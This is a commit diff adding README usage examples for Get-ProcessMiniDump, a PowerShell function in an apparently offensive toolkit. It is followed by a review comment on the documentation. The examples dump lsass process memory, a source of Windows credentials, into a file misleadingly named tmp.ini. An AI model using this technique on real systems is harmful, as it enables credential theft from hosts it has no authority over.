
Commit 14bcf8d

committed
+Get-ProcessMiniDump
1 parent 411bef9 commit 14bcf8d

1 file changed

+41
-0
lines changed

README.md

Lines changed: 41 additions & 0 deletions
@@ -239,6 +239,47 @@ C:\PS> $Beep = $MicrosoftWin32UnsafeNativeMethods::GetProcAddress($Kernel32Ref,
239239
C:\PS> $MicrosoftWin32SafeNativeMethods::MessageBox([IntPtr]::Zero,$("{0:X}" -f [int64]$Beep),"Beep",0)
240240
```
241241

242+
### Get-ProcessMiniDump
243+
244+
Create process dump using Dbghelp::MiniDumpWriteDump.
245+
246+
```
247+
# Elevated user dumping elevated process
248+
249+
C:\PS> (Get-Process lsass).Id
250+
528
251+
252+
C:\PS> $CallResult = Get-ProcessMiniDump -ProcID 528 -Path C:\Users\asenath.waite\Desktop\tmp.ini -Verbose
253+
VERBOSE: [?] Running as: Administrator
254+
VERBOSE: [?] Administrator privileges required
255+
VERBOSE: [>] Administrator privileges held
256+
VERBOSE: [>] Process dump success!
257+
258+
C:\PS> $CallResult
259+
True
260+
261+
# low priv user dumping low priv process
262+
263+
C:\PS> (Get-Process calc).Id
264+
2424
265+
266+
C:\PS> $CallResult = Get-ProcessMiniDump -ProcID 2424 -Path C:\Users\asenath.waite\Desktop\tmp.ini -Verbose
267+
VERBOSE: [?] Running as: asenath.waite
268+
VERBOSE: [>] Process dump success!
269+
270+
C:\PS> $CallResult
271+
True
272+
273+
# low priv user dumping elevated process
274+
C:\PS> $CallResult = Get-ProcessMiniDump -ProcID 4 -Path C:\Users\asenath.waite\Desktop\tmp.ini -Verbose
275+
VERBOSE: [?] Running as: asenath.waite
276+
VERBOSE: [?] Administrator privileges required
277+
VERBOSE: [!] Administrator privileges not held!
278+
279+
C:\PS> $CallResult
280+
False
281+
```
282+
242283
## pwnd
243284

244285
### Bypass-UAC
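Review bot: the new Get-ProcessMiniDump section documents the function only through transcripts and never describes its interface; the one-line synopsis "Create process dump using Dbghelp::MiniDumpWriteDump." should be followed by what -ProcID and -Path expect, what the function returns (the transcripts assign $CallResult and show True/False, but the meaning of that value is never stated), and which MiniDumpWriteDump dump type is written, since "process dump" alone does not say what the file contains. The three scenarios also deserve a sentence each rather than only a comment line: the output shows that dumping a process of the same integrity level needs no elevation while dumping an elevated process (PID 528, PID 4) prints "Administrator privileges required" and fails without them, and that condition is the most useful thing for a reader to know up front. Finally, the examples write the dump to a user's Desktop as tmp.ini; a neutral placeholder such as C:\path\to\dump.dmp would make clear that the extension is arbitrary and avoid baking a specific account's path into the README.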
